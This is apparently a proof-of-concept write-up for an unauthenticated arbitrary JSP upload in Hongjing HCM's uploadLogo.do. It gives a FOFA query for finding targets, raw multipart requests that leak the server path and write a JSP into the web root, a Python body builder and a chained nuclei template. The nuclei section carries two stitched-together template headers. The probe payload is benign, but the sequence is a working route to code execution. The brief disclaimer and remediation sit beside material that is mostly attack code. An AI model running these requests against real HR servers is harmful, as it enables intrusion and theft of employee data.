Contents
- Disclaimer
- Vulnerability description
- Search syntax
- Reproduction
- nuclei
- Remediation
Disclaimer
This article is for learning and exchange only. Do not use it for illegal purposes; the user bears sole responsibility, and the author accepts no liability.
Vulnerability description
Hongjing HCM is an enterprise management system built on a mature human capital management model and a flexible, open technical architecture, offering configurable tools such as business-model definition, permission management, a workflow platform and an alerting platform. Its uploadLogo.do endpoint has an arbitrary file upload vulnerability: the path form field tells the server where to write the upload, and the file content is not validated, so a JSP can be written into the web root and then executed by requesting it.
Search syntax
fofa
body='<div class="hj-hy-all-one-logo"'
Reproduction
First obtain a session cookie with an unauthenticated request to
http://ip/module/system/qrcard/mobilewrite/qrcardmain.jsp
The JSESSIONID comes back in the Set-Cookie header.
Obtain the upload path: send the request below with an empty path field. The response embeds the server-side upload directory in document.getElementById("pathvalue").value="...".
POST /sys/cms/uploadLogo.do?b_upload=upload&isClose=2&type=1 HTTP/1.1
Host:
User-Agent: Mozilla/4.0(compatible; MSIE 8.0;Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: JSESSIONID=938C0F04C50E2F19741D5C23F3504CA2
Content-Length: 635
Content-Type: multipart/form-data; boundary=09040231427371112abff3a2a34c3efe

--09040231427371112abff3a2a34c3efe
Content-Disposition: form-data; name="path"

--09040231427371112abff3a2a34c3efe
Content-Disposition: form-data; name="lfType"

0
--09040231427371112abff3a2a34c3efe
Content-Disposition: form-data; name="logofile"; filename=""
Content-Type: image/gif

<%out.println("<h1>Hello World!</h1>");%>
--09040231427371112abff3a2a34c3efe
Content-Disposition: form-data; name="twoFile"; filename=""
Content-Type: image/gif

<%out.println("<h1>Hello World!</h1>");%>
--09040231427371112abff3a2a34c3efe
Content-Disposition: form-data; name="param"

param
--09040231427371112abff3a2a34c3efe--
Upload the file: put the directory value leaked in the previous step, with the JSP file name appended, into the path field. The ~XX sequences are hex-encoded bytes (~2f is "/", ~2d is "-", ~2e is "."); decoded, the value in the example below is /opt/apache-tomcat-9.0.33/webapps/hrms/1.jsp.
POST /sys/cms/uploadLogo.do?b_upload=upload&isClose=2&type=1 HTTP/1.1
Host:
Cookie: JSESSIONID=938C0F04C50E2F19741D5C23F3504CA2
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfjKBvGWJbG07Z02r
Content-Length: 644

------WebKitFormBoundaryfjKBvGWJbG07Z02r
Content-Disposition: form-data; name="path"

~2fopt~2fapache~2dtomcat~2d~39~2e~30~2e~33~33~2fwebapps~2fhrms~2f1.jsp
------WebKitFormBoundaryfjKBvGWJbG07Z02r
Content-Disposition: form-data; name="lfType"

0
------WebKitFormBoundaryfjKBvGWJbG07Z02r
Content-Disposition: form-data; name="logofile"; filename=""
Content-Type: image/gif

<%out.println("<h1>Hello World!</h1>");%>
------WebKitFormBoundaryfjKBvGWJbG07Z02r
Content-Disposition: form-data; name="twoFile"; filename=""
Content-Type: image/gif

<%out.println("<h1>Hello World!</h1>");%>
------WebKitFormBoundaryfjKBvGWJbG07Z02r--
Visit http://ip/1.jsp; a response containing <h1>Hello World!</h1> confirms the JSP was written and executed.
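The three steps above can be rehearsed offline before touching a target. The following is an added example, not code from the original post or from the vendor. It assumes two things inferred from the sample requests on this page and not confirmed against the product: that the directory value leaked in step 1 uses a "~XX" hex-byte encoding (the page's path field is ~2fopt~2fapache~2dtomcat~2d~39~2e~30~2e~33~33~2fwebapps~2fhrms~2f1.jsp), and that the step-1 response embeds that value in document.getElementById("pathvalue").value="...". SAMPLE_RESPONSE is constructed for the example; the decoder, encoder and multipart builder are the hypothetical helpers a tester would keep beside the nuclei template.

```python
"""Offline helpers for the cookie -> leak path -> upload flow described above.
Added example; not from the original post or the vendor. The ~XX encoding and
the pathvalue marker are assumptions inferred from the page's sample requests.
"""
import re
from typing import List, Optional, Tuple

BOUNDARY = "09040231427371112abff3a2a34c3efe"
UPLOAD_URL = "/sys/cms/uploadLogo.do?b_upload=upload&isClose=2&type=1"
JSP_PROBE = '<%out.println("<h1>Hello World!</h1>");%>'

# Constructed response fragment, shaped like the one the page's nuclei extractor reads.
SAMPLE_RESPONSE = (
    '<script>document.getElementById("pathvalue").value='
    '"~2fopt~2fapache~2dtomcat~2d~39~2e~30~2e~33~33~2fwebapps~2fhrms~2f";</script>'
)

_TILDE_HEX = re.compile(r"~([0-9a-fA-F]{2})")


def decode_tilde_path(value: str) -> str:
    """Expand each ~XX pair to the ASCII character it names (assumed encoding)."""
    return _TILDE_HEX.sub(lambda m: chr(int(m.group(1), 16)), value)


def encode_tilde_path(path: str) -> str:
    """Inverse of decode_tilde_path: ASCII letters pass through, everything else becomes ~XX."""
    return "".join(c if c.isascii() and c.isalpha() else "~%02x" % ord(c) for c in path)


def extract_pathvalue(html: str) -> Optional[str]:
    """Pull the leaked directory out of a step-1 response (same regex as the nuclei extractor)."""
    m = re.search(r'getElementById\("pathvalue"\)\.value="(.*?)"', html)
    return m.group(1) if m else None


def build_multipart(fields: List[Tuple[str, str]],
                    files: List[Tuple[str, str, str, str]],
                    boundary: str = BOUNDARY) -> bytes:
    """Assemble a multipart/form-data body with CRLF line endings (RFC 7578)."""
    out = []
    for name, value in fields:
        out.append(f'--{boundary}\r\nContent-Disposition: form-data; name="{name}"\r\n\r\n{value}\r\n')
    for name, filename, ctype, content in files:
        out.append(
            f'--{boundary}\r\nContent-Disposition: form-data; name="{name}"; filename="{filename}"\r\n'
            f"Content-Type: {ctype}\r\n\r\n{content}\r\n"
        )
    out.append(f"--{boundary}--\r\n")
    return "".join(out).encode()


def build_probe_body(encoded_dir: str, jsp_name: str = "1.jsp") -> bytes:
    """Step-2 body: leaked directory plus the JSP name in `path`, probe JSP in both file parts."""
    if not decode_tilde_path(encoded_dir).endswith("/"):
        raise ValueError("leaked value does not look like a directory")
    return build_multipart(
        fields=[("path", encoded_dir + jsp_name), ("lfType", "0")],
        files=[("logofile", "", "image/gif", JSP_PROBE), ("twoFile", "", "image/gif", JSP_PROBE)],
    )


def probe_path_on_disk(encoded_dir: str, jsp_name: str = "1.jsp") -> str:
    """Where the write lands, for the report: decoded directory plus the file name."""
    return decode_tilde_path(encoded_dir) + jsp_name


if __name__ == "__main__":
    leaked = extract_pathvalue(SAMPLE_RESPONSE)
    print("leaked (encoded):", leaked)
    print("writes to       :", probe_path_on_disk(leaked))
    print("round trip ok   :", encode_tilde_path(decode_tilde_path(leaked)) == leaked)
    print("POST", UPLOAD_URL, "body bytes:", len(build_probe_body(leaked)))
```

The round-trip check is the useful part: if encode_tilde_path(decode_tilde_path(v)) does not reproduce a value leaked by a real target, the encoding assumption is wrong for that build and the path field should be copied verbatim from the response instead of being rebuilt.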
nuclei
id: hongjingHC_uploadLogo.do_api_anyfile_upload
info:
  name: hongjingHC_uploadLogo.do_api_anyfile_upload
  author: xl
  severity: Critical

id: custom-upload-exploit
info:
  name: Custom Upload Exploit Detection
  author: YourName
  severity: high
  description: |
    This template detects a potential vulnerability in the system by uploading a crafted file and checking if it can be executed.
requests:
  # Step 1: obtain an unauthenticated session cookie.
  - method: GET
    path:
      - "/module/system/qrcard/mobilewrite/qrcardmain.jsp"
    headers:
      Host: "{{Hostname}}"
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36
      Accept-Encoding: gzip, deflate
      Connection: keep-alive
    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "JSESSIONID"
    extractors:
      - type: regex
        name: jsessionid
        part: header
        internal: true
        group: 1
        regex:
          - 'JSESSIONID=([^;]+)'
  # Step 2: upload with an empty path to leak the server-side directory.
  - method: POST
    path:
      - "/sys/cms/uploadLogo.do?b_upload=upload&isClose=2&type=1"
    headers:
      Host: "{{Hostname}}"
      User-Agent: Mozilla/4.0(compatible; MSIE 8.0;Windows NT 6.1)
      Accept-Encoding: gzip, deflate
      Accept: "*/*"
      Connection: close
      Cookie: "JSESSIONID={{jsessionid}}"
      Content-Type: "multipart/form-data; boundary=09040231427371112abff3a2a34c3efe"
    body: |
      --09040231427371112abff3a2a34c3efe
      Content-Disposition: form-data; name="path"

      --09040231427371112abff3a2a34c3efe
      Content-Disposition: form-data; name="lfType"

      0
      --09040231427371112abff3a2a34c3efe
      Content-Disposition: form-data; name="logofile"; filename=""
      Content-Type: image/gif

      <%out.println("<h1>Hello World!</h1>");%>
      --09040231427371112abff3a2a34c3efe
      Content-Disposition: form-data; name="twoFile"; filename=""
      Content-Type: image/gif

      <%out.println("<h1>Hello World!</h1>");%>
      --09040231427371112abff3a2a34c3efe
      Content-Disposition: form-data; name="param"

      param
      --09040231427371112abff3a2a34c3efe--
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
    extractors:
      - type: regex
        name: upload_path
        part: body
        group: 1
        regex:
          - 'getElementById\("pathvalue"\)\.value="(.*?)"'
  # Step 3: write the probe JSP into the leaked directory.
  - method: POST
    path:
      - "/sys/cms/uploadLogo.do?b_upload=upload&isClose=2&type=1"
    headers:
      Host: "{{Hostname}}"
      User-Agent: Mozilla/4.0(compatible; MSIE 8.0;Windows NT 6.1)
      Accept-Encoding: gzip, deflate
      Accept: "*/*"
      Connection: close
      Cookie: "JSESSIONID={{jsessionid}}"
      Content-Type: "multipart/form-data; boundary=----WebKitFormBoundaryfjKBvGWJbG07Z02r"
    body: |
      ------WebKitFormBoundaryfjKBvGWJbG07Z02r
      Content-Disposition: form-data; name="path"

      {{upload_path}}1.jsp
      ------WebKitFormBoundaryfjKBvGWJbG07Z02r
      Content-Disposition: form-data; name="lfType"

      0
      ------WebKitFormBoundaryfjKBvGWJbG07Z02r
      Content-Disposition: form-data; name="logofile"; filename=""
      Content-Type: image/gif

      <%out.println("<h1>Hello World!</h1>");%>
      ------WebKitFormBoundaryfjKBvGWJbG07Z02r
      Content-Disposition: form-data; name="twoFile"; filename=""
      Content-Type: image/gif

      <%out.println("<h1>Hello World!</h1>");%>
      ------WebKitFormBoundaryfjKBvGWJbG07Z02r--
  # Step 4: the leaked value is a filesystem directory, so the JSP is requested
  # from the web root, as in the walkthrough above, not from that path.
  - method: GET
    path:
      - "/1.jsp"
    headers:
      Host: "{{Hostname}}"
      User-Agent: Mozilla/4.0(compatible; MSIE 8.0;Windows NT 6.1)
      Accept-Encoding: gzip, deflate
      Accept: "*/*"
      Connection: close
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "<h1>Hello World!</h1>"
Remediation
Upgrade to the latest version. Until that is possible, restrict access to /sys/cms/uploadLogo.do at the reverse proxy, and verify that the handler no longer takes the destination from the client-supplied path field or stores logo uploads with executable extensions inside the web root.